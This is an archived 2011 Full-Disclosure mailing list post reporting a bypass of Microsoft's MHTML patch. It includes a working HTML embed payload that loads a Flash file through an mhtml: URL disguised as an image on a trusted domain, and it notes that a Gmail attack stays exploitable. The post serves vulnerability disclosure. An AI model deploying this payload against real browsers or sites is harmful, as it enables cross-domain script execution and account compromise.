[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] MS mhtml patch bypass

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] MS mhtml patch bypass
From: sec yun <root@xxxxxxxxxx>
Date: Tue, 19 Apr 2011 13:40:34 +0800

Hi

someone report a case about bypass mhtml patch

http://www.wooyun.org/bugs/wooyun-2010-01929

<embed type="application/x-shockwave-flash" src="mhtml:
http://trusteddomain.com/wooyun.jpg!wooyun.swf"; allowNetworking=all
AllowScriptAccess=samedomain width=500 height=500></embed>

some VUL like http://www.wooyun.org/bugs/wooyun-2010-01474 (gmail hack) will
stiil be exploitable

credits: http://www.wooyun.org/whitehats/latentwind

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Windows Synchronization Object Vulnerabilites in Antivirus Suites
Next by Date: Re: [Full-disclosure] Florida Power & Light Company (FPL) Fort Sumner Wind turbine Control SCADA was HACKED
Previous by thread: [Full-disclosure] Windows Synchronization Object Vulnerabilites in Antivirus Suites
Next by thread: [Full-disclosure] [Annoucement] ClubHack Magazine - Call for Articles
Index(es):
- Date
- Thread